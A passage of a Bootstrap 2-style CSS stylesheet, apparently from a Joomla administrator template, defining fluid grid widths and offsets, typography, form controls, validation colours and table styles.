	width: 100%;
	*zoom: 1;
}
.row-fluid:before,
.row-fluid:after {
	display: table;
	content: "";
	line-height: 0;
}
.row-fluid:after {
	clear: both;
}
.row-fluid [class*="span"] {
	display: block;
	width: 100%;
	min-height: 28px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	float: left;
	margin-left: 2.127659574%;
	*margin-left: 2.0744680846383%;
}
.row-fluid [class*="span"]:first-child {
	margin-left: 0;
}
.row-fluid .controls-row [class*="span"] + [class*="span"] {
	margin-left: 2.127659574%;
}
.row-fluid .span12 {
	width: 99.99999999%;
	*width: 99.946808500638%;
}
.row-fluid .span11 {
	width: 91.489361693%;
	*width: 91.436170203638%;
}
.row-fluid .span10 {
	width: 82.978723396%;
	*width: 82.925531906638%;
}
.row-fluid .span9 {
	width: 74.468085099%;
	*width: 74.414893609638%;
}
.row-fluid .span8 {
	width: 65.957446802%;
	*width: 65.904255312638%;
}
.row-fluid .span7 {
	width: 57.446808505%;
	*width: 57.393617015638%;
}
.row-fluid .span6 {
	width: 48.936170208%;
	*width: 48.882978718638%;
}
.row-fluid .span5 {
	width: 40.425531911%;
	*width: 40.372340421638%;
}
.row-fluid .span4 {
	width: 31.914893614%;
	*width: 31.861702124638%;
}
.row-fluid .span3 {
	width: 23.404255317%;
	*width: 23.351063827638%;
}
.row-fluid .span2 {
	width: 14.89361702%;
	*width: 14.840425530638%;
}
.row-fluid .span1 {
	width: 6.382978723%;
	*width: 6.3297872336383%;
}
.row-fluid .offset12 {
	margin-left: 104.255319138%;
	*margin-left: 104.14893615928%;
}
.row-fluid .offset12:first-child {
	margin-left: 102.127659564%;
	*margin-left: 102.02127658528%;
}
.row-fluid .offset11 {
	margin-left: 95.744680841%;
	*margin-left: 95.638297862277%;
}
.row-fluid .offset11:first-child {
	margin-left: 93.617021267%;
	*margin-left: 93.510638288277%;
}
.row-fluid .offset10 {
	margin-left: 87.234042544%;
	*margin-left: 87.127659565277%;
}
.row-fluid .offset10:first-child {
	margin-left: 85.10638297%;
	*margin-left: 84.999999991277%;
}
.row-fluid .offset9 {
	margin-left: 78.723404247%;
	*margin-left: 78.617021268277%;
}
.row-fluid .offset9:first-child {
	margin-left: 76.595744673%;
	*margin-left: 76.489361694277%;
}
.row-fluid .offset8 {
	margin-left: 70.21276595%;
	*margin-left: 70.106382971277%;
}
.row-fluid .offset8:first-child {
	margin-left: 68.085106376%;
	*margin-left: 67.978723397277%;
}
.row-fluid .offset7 {
	margin-left: 61.702127653%;
	*margin-left: 61.595744674277%;
}
.row-fluid .offset7:first-child {
	margin-left: 59.574468079%;
	*margin-left: 59.468085100277%;
}
.row-fluid .offset6 {
	margin-left: 53.191489356%;
	*margin-left: 53.085106377277%;
}
.row-fluid .offset6:first-child {
	margin-left: 51.063829782%;
	*margin-left: 50.957446803277%;
}
.row-fluid .offset5 {
	margin-left: 44.680851059%;
	*margin-left: 44.574468080277%;
}
.row-fluid .offset5:first-child {
	margin-left: 42.553191485%;
	*margin-left: 42.446808506277%;
}
.row-fluid .offset4 {
	margin-left: 36.170212762%;
	*margin-left: 36.063829783277%;
}
.row-fluid .offset4:first-child {
	margin-left: 34.042553188%;
	*margin-left: 33.936170209277%;
}
.row-fluid .offset3 {
	margin-left: 27.659574465%;
	*margin-left: 27.553191486277%;
}
.row-fluid .offset3:first-child {
	margin-left: 25.531914891%;
	*margin-left: 25.425531912277%;
}
.row-fluid .offset2 {
	margin-left: 19.148936168%;
	*margin-left: 19.042553189277%;
}
.row-fluid .offset2:first-child {
	margin-left: 17.021276594%;
	*margin-left: 16.914893615277%;
}
.row-fluid .offset1 {
	margin-left: 10.638297871%;
	*margin-left: 10.531914892277%;
}
.row-fluid .offset1:first-child {
	margin-left: 8.510638297%;
	*margin-left: 8.4042553182766%;
}
[class*="span"].hide,
.row-fluid [class*="span"].hide {
	display: none;
}
[class*="span"].pull-right,
.row-fluid [class*="span"].pull-right {
	float: right;
}
.container {
	margin-right: auto;
	margin-left: auto;
	*zoom: 1;
}
.container:before,
.container:after {
	display: table;
	content: "";
	line-height: 0;
}
.container:after {
	clear: both;
}
.container-fluid {
	padding-right: 20px;
	padding-left: 20px;
	*zoom: 1;
}
.container-fluid:before,
.container-fluid:after {
	display: table;
	content: "";
	line-height: 0;
}
.container-fluid:after {
	clear: both;
}
p {
	margin: 0 0 9px;
}
.lead {
	margin-bottom: 18px;
	font-size: 19.5px;
	font-weight: 200;
	line-height: 27px;
}
small {
	font-size: 85%;
}
strong {
	font-weight: bold;
}
em {
	font-style: italic;
}
cite {
	font-style: normal;
}
.muted {
	color: #999;
}
a.muted:hover,
a.muted:focus {
	color: #808080;
}
.text-warning {
	color: #c09853;
}
a.text-warning:hover,
a.text-warning:focus {
	color: #a47e3c;
}
.text-error {
	color: #b94a48;
}
a.text-error:hover,
a.text-error:focus {
	color: #953b39;
}
.text-info {
	color: #3a87ad;
}
a.text-info:hover,
a.text-info:focus {
	color: #2d6987;
}
.text-success {
	color: #468847;
}
a.text-success:hover,
a.text-success:focus {
	color: #356635;
}
.text-left {
	text-align: left;
}
.text-right {
	text-align: right;
}
.text-center {
	text-align: center;
}
h1,
h2,
h3,
h4,
h5,
h6 {
	margin: 9px 0;
	font-family: inherit;
	font-weight: bold;
	line-height: 18px;
	color: inherit;
	text-rendering: optimizelegibility;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small {
	font-weight: normal;
	line-height: 1;
	color: #999;
}
h1,
h2,
h3 {
	line-height: 36px;
}
h1 {
	font-size: 35.75px;
}
h2 {
	font-size: 29.25px;
}
h3 {
	font-size: 22.75px;
}
h4 {
	font-size: 16.25px;
}
h5 {
	font-size: 13px;
}
h6 {
	font-size: 11.05px;
}
h1 small {
	font-size: 22.75px;
}
h2 small {
	font-size: 16.25px;
}
h3 small {
	font-size: 13px;
}
h4 small {
	font-size: 13px;
}
.page-header {
	padding-bottom: 8px;
	margin: 18px 0 27px;
	border-bottom: 1px solid #eee;
}
ul,
ol {
	padding: 0;
	margin: 0 0 9px 25px;
}
ul ul,
ul ol,
ol ol,
ol ul {
	margin-bottom: 0;
}
li {
	line-height: 18px;
}
ul.unstyled,
ol.unstyled {
	margin-left: 0;
	list-style: none;
}
ul.inline,
ol.inline {
	margin-left: 0;
	list-style: none;
}
ul.inline > li,
ol.inline > li {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	padding-left: 5px;
	padding-right: 5px;
}
dl {
	margin-bottom: 18px;
}
dt,
dd {
	line-height: 18px;
}
dt {
	font-weight: bold;
}
dd {
	margin-left: 9px;
}
.dl-horizontal {
	*zoom: 1;
}
.dl-horizontal:before,
.dl-horizontal:after {
	display: table;
	content: "";
	line-height: 0;
}
.dl-horizontal:after {
	clear: both;
}
.dl-horizontal dt {
	float: left;
	width: 160px;
	clear: left;
	text-align: right;
	overflow: hidden;
	text-overflow: ellipsis;
	white-space: nowrap;
}
.dl-horizontal dd {
	margin-left: 180px;
}
hr {
	margin: 18px 0;
	border: 0;
	border-top: 1px solid #eee;
	border-bottom: 1px solid #fff;
}
abbr[title],
abbr[data-original-title] {
	cursor: help;
	border-bottom: 1px dotted #999;
}
abbr.initialism {
	font-size: 90%;
	text-transform: uppercase;
}
blockquote {
	padding: 0 0 0 15px;
	margin: 0 0 18px;
	border-left: 5px solid #eee;
}
blockquote p {
	margin-bottom: 0;
	font-size: 16.25px;
	font-weight: 300;
	line-height: 1.25;
}
blockquote small {
	display: block;
	line-height: 18px;
	color: #999;
}
blockquote small:before {
	content: '\2014 \00A0';
}
blockquote.pull-right {
	float: right;
	padding-right: 15px;
	padding-left: 0;
	border-right: 5px solid #eee;
	border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
	text-align: right;
}
blockquote.pull-right small:before {
	content: '';
}
blockquote.pull-right small:after {
	content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
	content: "";
}
address {
	display: block;
	margin-bottom: 18px;
	font-style: normal;
	line-height: 18px;
}
code,
pre {
	padding: 0 3px 2px;
	font-family: Monaco, Menlo, Consolas, "Courier New", monospace;
	font-size: 11px;
	color: #333;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
code {
	padding: 2px 4px;
	color: #d14;
	background-color: #f7f7f9;
	border: 1px solid #e1e1e8;
	white-space: nowrap;
}
pre {
	display: block;
	padding: 8.5px;
	margin: 0 0 9px;
	font-size: 12px;
	line-height: 18px;
	word-break: break-all;
	word-wrap: break-word;
	white-space: pre;
	white-space: pre-wrap;
	background-color: #f5f5f5;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.15);
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
pre.prettyprint {
	margin-bottom: 18px;
}
pre code {
	padding: 0;
	color: inherit;
	white-space: pre;
	white-space: pre-wrap;
	background-color: transparent;
	border: 0;
}
.pre-scrollable {
	max-height: 340px;
	overflow-y: scroll;
}
form {
	margin: 0 0 18px;
}
fieldset {
	padding: 0;
	margin: 0;
	border: 0;
}
legend {
	display: block;
	width: 100%;
	padding: 0;
	margin-bottom: 18px;
	font-size: 19.5px;
	line-height: 36px;
	color: #333;
	border: 0;
	border-bottom: 1px solid #e5e5e5;
}
legend small {
	font-size: 13.5px;
	color: #999;
}
label,
input,
button,
select,
textarea {
	font-size: 13px;
	font-weight: normal;
	line-height: 18px;
}
input,
button,
select,
textarea {
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
label {
	display: block;
	margin-bottom: 5px;
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
	display: inline-block;
	height: 18px;
	padding: 4px 6px;
	margin-bottom: 9px;
	font-size: 13px;
	line-height: 18px;
	color: #555;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
	vertical-align: middle;
}
input,
textarea,
.uneditable-input {
	width: 206px;
}
textarea {
	height: auto;
}
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
	background-color: #fff;
	border: 1px solid #ccc;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-webkit-transition: border linear .2s, box-shadow linear .2s;
	-moz-transition: border linear .2s, box-shadow linear .2s;
	-o-transition: border linear .2s, box-shadow linear .2s;
	transition: border linear .2s, box-shadow linear .2s;
}
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.uneditable-input:focus {
	border-color: rgba(82,168,236,0.8);
	outline: 0;
	outline: thin dotted \9;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
	box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
}
input[type="radio"],
input[type="checkbox"] {
	margin: 4px 0 0;
	*margin-top: 0;
	margin-top: 1px \9;
	line-height: normal;
}
input[type="file"],
input[type="image"],
input[type="submit"],
input[type="reset"],
input[type="button"],
input[type="radio"],
input[type="checkbox"] {
	width: auto;
}
select,
input[type="file"] {
	height: 28px;
	*margin-top: 4px;
	line-height: 28px;
}
select {
	width: 220px;
	border: 1px solid #ccc;
	background-color: #fff;
}
select[multiple],
select[size] {
	height: auto;
}
select:focus,
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
	outline: thin dotted #333;
	outline: 5px auto -webkit-focus-ring-color;
	outline-offset: -2px;
}
.uneditable-input,
.uneditable-textarea {
	color: #999;
	background-color: #fcfcfc;
	border-color: #ccc;
	-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
	-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
	box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
	cursor: not-allowed;
}
.uneditable-input {
	overflow: hidden;
	white-space: nowrap;
}
.uneditable-textarea {
	width: auto;
	height: auto;
}
input:-moz-placeholder,
textarea:-moz-placeholder {
	color: #999;
}
input:-ms-input-placeholder,
textarea:-ms-input-placeholder {
	color: #999;
}
input::-webkit-input-placeholder,
textarea::-webkit-input-placeholder {
	color: #999;
}
.radio,
.checkbox {
	min-height: 18px;
	padding-left: 20px;
}
.radio input[type="radio"],
.checkbox input[type="checkbox"] {
	float: left;
	margin-left: -20px;
}
.controls > .radio:first-child,
.controls > .checkbox:first-child {
	padding-top: 5px;
}
.radio.inline,
.checkbox.inline {
	display: inline-block;
	padding-top: 5px;
	margin-bottom: 0;
	vertical-align: middle;
}
.radio.inline + .radio.inline,
.checkbox.inline + .checkbox.inline {
	margin-left: 10px;
}
.input-mini {
	width: 60px;
}
.input-small {
	width: 90px;
}
.input-medium {
	width: 150px;
}
.input-large {
	width: 210px;
}
.input-xlarge {
	width: 270px;
}
.input-xxlarge {
	width: 530px;
}
input[class*="span"],
select[class*="span"],
textarea[class*="span"],
.uneditable-input[class*="span"],
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"] {
	float: none;
	margin-left: 0;
}
.input-append input[class*="span"],
.input-append .uneditable-input[class*="span"],
.input-prepend input[class*="span"],
.input-prepend .uneditable-input[class*="span"],
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"],
.row-fluid .input-prepend [class*="span"],
.row-fluid .input-append [class*="span"] {
	display: inline-block;
}
input,
textarea,
.uneditable-input {
	margin-left: 0;
}
.controls-row [class*="span"] + [class*="span"] {
	margin-left: 20px;
}
input.span12,
textarea.span12,
.uneditable-input.span12 {
	width: 926px;
}
input.span11,
textarea.span11,
.uneditable-input.span11 {
	width: 846px;
}
input.span10,
textarea.span10,
.uneditable-input.span10 {
	width: 766px;
}
input.span9,
textarea.span9,
.uneditable-input.span9 {
	width: 686px;
}
input.span8,
textarea.span8,
.uneditable-input.span8 {
	width: 606px;
}
input.span7,
textarea.span7,
.uneditable-input.span7 {
	width: 526px;
}
input.span6,
textarea.span6,
.uneditable-input.span6 {
	width: 446px;
}
input.span5,
textarea.span5,
.uneditable-input.span5 {
	width: 366px;
}
input.span4,
textarea.span4,
.uneditable-input.span4 {
	width: 286px;
}
input.span3,
textarea.span3,
.uneditable-input.span3 {
	width: 206px;
}
input.span2,
textarea.span2,
.uneditable-input.span2 {
	width: 126px;
}
input.span1,
textarea.span1,
.uneditable-input.span1 {
	width: 46px;
}
.controls-row {
	*zoom: 1;
}
.controls-row:before,
.controls-row:after {
	display: table;
	content: "";
	line-height: 0;
}
.controls-row:after {
	clear: both;
}
.controls-row [class*="span"],
.row-fluid .controls-row [class*="span"] {
	float: left;
}
.controls-row .checkbox[class*="span"],
.controls-row .radio[class*="span"] {
	padding-top: 5px;
}
input[disabled],
select[disabled],
textarea[disabled],
input[readonly],
select[readonly],
textarea[readonly] {
	cursor: not-allowed;
	background-color: #eee;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"][readonly],
input[type="checkbox"][readonly] {
	background-color: transparent;
}
.control-group.warning .control-label,
.control-group.warning .help-block,
.control-group.warning .help-inline {
	color: #c09853;
}
.control-group.warning .checkbox,
.control-group.warning .radio,
.control-group.warning input,
.control-group.warning select,
.control-group.warning textarea {
	color: #c09853;
}
.control-group.warning input,
.control-group.warning select,
.control-group.warning textarea {
	border-color: #c09853;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.warning input:focus,
.control-group.warning select:focus,
.control-group.warning textarea:focus {
	border-color: #a47e3c;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
}
.control-group.warning .input-prepend .add-on,
.control-group.warning .input-append .add-on {
	color: #c09853;
	background-color: #fcf8e3;
	border-color: #c09853;
}
.control-group.error .control-label,
.control-group.error .help-block,
.control-group.error .help-inline {
	color: #b94a48;
}
.control-group.error .checkbox,
.control-group.error .radio,
.control-group.error input,
.control-group.error select,
.control-group.error textarea {
	color: #b94a48;
}
.control-group.error input,
.control-group.error select,
.control-group.error textarea {
	border-color: #b94a48;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.error input:focus,
.control-group.error select:focus,
.control-group.error textarea:focus {
	border-color: #953b39;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
}
.control-group.error .input-prepend .add-on,
.control-group.error .input-append .add-on {
	color: #b94a48;
	background-color: #f2dede;
	border-color: #b94a48;
}
.control-group.success .control-label,
.control-group.success .help-block,
.control-group.success .help-inline {
	color: #468847;
}
.control-group.success .checkbox,
.control-group.success .radio,
.control-group.success input,
.control-group.success select,
.control-group.success textarea {
	color: #468847;
}
.control-group.success input,
.control-group.success select,
.control-group.success textarea {
	border-color: #468847;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.success input:focus,
.control-group.success select:focus,
.control-group.success textarea:focus {
	border-color: #356635;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
}
.control-group.success .input-prepend .add-on,
.control-group.success .input-append .add-on {
	color: #468847;
	background-color: #dff0d8;
	border-color: #468847;
}
.control-group.info .control-label,
.control-group.info .help-block,
.control-group.info .help-inline {
	color: #3a87ad;
}
.control-group.info .checkbox,
.control-group.info .radio,
.control-group.info input,
.control-group.info select,
.control-group.info textarea {
	color: #3a87ad;
}
.control-group.info input,
.control-group.info select,
.control-group.info textarea {
	border-color: #3a87ad;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.info input:focus,
.control-group.info select:focus,
.control-group.info textarea:focus {
	border-color: #2d6987;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
}
.control-group.info .input-prepend .add-on,
.control-group.info .input-append .add-on {
	color: #3a87ad;
	background-color: #d9edf7;
	border-color: #3a87ad;
}
input:focus:invalid,
textarea:focus:invalid,
select:focus:invalid {
	color: #b94a48;
	border-color: #ee5f5b;
}
input:focus:invalid:focus,
textarea:focus:invalid:focus,
select:focus:invalid:focus {
	border-color: #e9322d;
	-webkit-box-shadow: 0 0 6px #f8b9b7;
	-moz-box-shadow: 0 0 6px #f8b9b7;
	box-shadow: 0 0 6px #f8b9b7;
}
.form-actions {
	padding: 17px 20px 18px;
	margin-top: 18px;
	margin-bottom: 18px;
	background-color: #f5f5f5;
	border-top: 1px solid #e5e5e5;
	*zoom: 1;
}
.form-actions:before,
.form-actions:after {
	display: table;
	content: "";
	line-height: 0;
}
.form-actions:after {
	clear: both;
}
.help-block,
.help-inline {
	color: #595959;
}
.help-block {
	display: block;
	margin-bottom: 9px;
}
.help-inline {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	vertical-align: middle;
	padding-left: 5px;
}
.input-append,
.input-prepend {
	display: inline-block;
	margin-bottom: 9px;
	vertical-align: middle;
	font-size: 0;
	white-space: nowrap;
}
.input-append input,
.input-append select,
.input-append .uneditable-input,
.input-append .dropdown-menu,
.input-append .popover,
.input-prepend input,
.input-prepend select,
.input-prepend .uneditable-input,
.input-prepend .dropdown-menu,
.input-prepend .popover {
	font-size: 13px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input,
.input-prepend input,
.input-prepend select,
.input-prepend .uneditable-input {
	position: relative;
	margin-bottom: 0;
	*margin-left: 0;
	vertical-align: top;
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-append input:focus,
.input-append select:focus,
.input-append .uneditable-input:focus,
.input-prepend input:focus,
.input-prepend select:focus,
.input-prepend .uneditable-input:focus {
	z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
	display: inline-block;
	width: auto;
	height: 18px;
	min-width: 16px;
	padding: 4px 5px;
	font-size: 13px;
	font-weight: normal;
	line-height: 18px;
	text-align: center;
	text-shadow: 0 1px 0 #fff;
	background-color: #eee;
	border: 1px solid #ccc;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .add-on,
.input-prepend .btn,
.input-prepend .btn-group > .dropdown-toggle {
	vertical-align: top;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.input-prepend .add-on,
.input-prepend .btn {
	margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
	margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
	margin-right: -1px;
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
	margin-left: -1px;
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend.input-append .btn-group:first-child {
	margin-left: 0;
}
input.search-query {
	padding-right: 14px;
	padding-right: 4px \9;
	padding-left: 14px;
	padding-left: 4px \9;
	margin-bottom: 0;
	-webkit-border-radius: 15px;
	-moz-border-radius: 15px;
	border-radius: 15px;
}
.form-search .input-append .search-query,
.form-search .input-prepend .search-query {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.form-search .input-append .search-query {
	-webkit-border-radius: 14px 0 0 14px;
	-moz-border-radius: 14px 0 0 14px;
	border-radius: 14px 0 0 14px;
}
.form-search .input-append .btn {
	-webkit-border-radius: 0 14px 14px 0;
	-moz-border-radius: 0 14px 14px 0;
	border-radius: 0 14px 14px 0;
}
.form-search .input-prepend .search-query {
	-webkit-border-radius: 0 14px 14px 0;
	-moz-border-radius: 0 14px 14px 0;
	border-radius: 0 14px 14px 0;
}
.form-search .input-prepend .btn {
	-webkit-border-radius: 14px 0 0 14px;
	-moz-border-radius: 14px 0 0 14px;
	border-radius: 14px 0 0 14px;
}
.js-stools-field-filter .input-prepend,
.js-stools-field-filter .input-append {
	margin-bottom: 0;
}
.form-search input,
.form-search textarea,
.form-search select,
.form-search .help-inline,
.form-search .uneditable-input,
.form-search .input-prepend,
.form-search .input-append,
.form-inline input,
.form-inline textarea,
.form-inline select,
.form-inline .help-inline,
.form-inline .uneditable-input,
.form-inline .input-prepend,
.form-inline .input-append,
.form-horizontal input,
.form-horizontal textarea,
.form-horizontal select,
.form-horizontal .help-inline,
.form-horizontal .uneditable-input,
.form-horizontal .input-prepend,
.form-horizontal .input-append {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	margin-bottom: 0;
	vertical-align: middle;
}
.form-search .hide,
.form-inline .hide,
.form-horizontal .hide {
	display: none;
}
.form-search label,
.form-inline label,
.form-search .btn-group,
.form-inline .btn-group {
	display: inline-block;
}
.form-search .input-append,
.form-inline .input-append,
.form-search .input-prepend,
.form-inline .input-prepend {
	margin-bottom: 0;
}
.form-search .radio,
.form-search .checkbox,
.form-inline .radio,
.form-inline .checkbox {
	padding-left: 0;
	margin-bottom: 0;
	vertical-align: middle;
}
.form-search .radio input[type="radio"],
.form-search .checkbox input[type="checkbox"],
.form-inline .radio input[type="radio"],
.form-inline .checkbox input[type="checkbox"] {
	float: left;
	margin-right: 3px;
	margin-left: 0;
}
.control-group {
	margin-bottom: 9px;
}
legend + .control-group {
	margin-top: 18px;
	-webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
	margin-bottom: 18px;
	*zoom: 1;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
	display: table;
	content: "";
	line-height: 0;
}
.form-horizontal .control-group:after {
	clear: both;
}
.form-horizontal .control-label {
	float: left;
	width: 160px;
	padding-top: 5px;
	text-align: right;
}
.form-horizontal .controls {
	*display: inline-block;
	*padding-left: 20px;
	margin-left: 180px;
	*margin-left: 0;
}
.form-horizontal .controls:first-child {
	*padding-left: 180px;
}
.form-horizontal .help-block {
	margin-bottom: 0;
}
.form-horizontal input + .help-block,
.form-horizontal select + .help-block,
.form-horizontal textarea + .help-block,
.form-horizontal .uneditable-input + .help-block,
.form-horizontal .input-prepend + .help-block,
.form-horizontal .input-append + .help-block {
	margin-top: 9px;
}
.form-horizontal .form-actions {
	padding-left: 180px;
}
.control-label .hasPopover,
.control-label .hasTooltip {
	display: inline-block;
}
.subform-repeatable-wrapper .btn-group>.btn.button {
	min-width: 0;
}
.subform-repeatable-wrapper .ui-sortable-helper {
	background: #fff;
}
.subform-repeatable-wrapper tr.ui-sortable-helper {
	display: table;
}
@media (min-width: 980px) and (max-width: 1215px) {
	.float-cols .control-label {
		float: none;
	}
	.float-cols .controls {
		margin-left: 0;
	}
}
table {
	max-width: 100%;
	background-color: transparent;
	border-collapse: collapse;
	border-spacing: 0;
}
.table {
	width: 100%;
	margin-bottom: 18px;
}
.table th,
.table td {
	padding: 8px;
	line-height: 18px;
	text-align: left;
	vertical-align: top;
	border-top: 1px solid #ddd;
}
.table th {
	font-weight: bold;
}
.table thead th {
	vertical-align: bottom;
}
.table caption + thead tr:first-child th,
.table caption + thead tr:first-child td,
.table colgroup + thead tr:first-child th,
.table colgroup + thead tr:first-child td,
.table thead:first-child tr:first-child th,
.table thead:first-child tr:first-child td {
	border-top: 0;
}
.table tbody + tbody {
	border-top: 2px solid #ddd;
}
.table .table {
	background-color: #fff;
}
.table-condensed th,
.table-condensed td {
	padding: 4px 5px;
}
.table-bordered {
	border: 1px solid #ddd;
	border-collapse: separate;
	*border-collapse: collapse;
	border-left: 0;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.table-bordered th,
.table-bordered td {
	border-left: 1px solid #ddd;
}
.table-bordered caption + thead tr:first-child th,
.table-bordered caption + tbody tr:first-child th,
.table-bordered caption + tbody tr:first-child td,
.table-bordered colgroup + thead tr:first-child th,
.table-bordered colgroup + tbody tr:first-child th,
.table-bordered colgroup + tbody tr:first-child td,
.table-bordered thead:first-child tr:first-child th,
.table-bordered tbody:first-child tr:first-child th,
.table-bordered tbody:first-child tr:first-child td {
	border-top: 0;
}
.table-bordered thead:first-child tr:first-child > th:first-child,
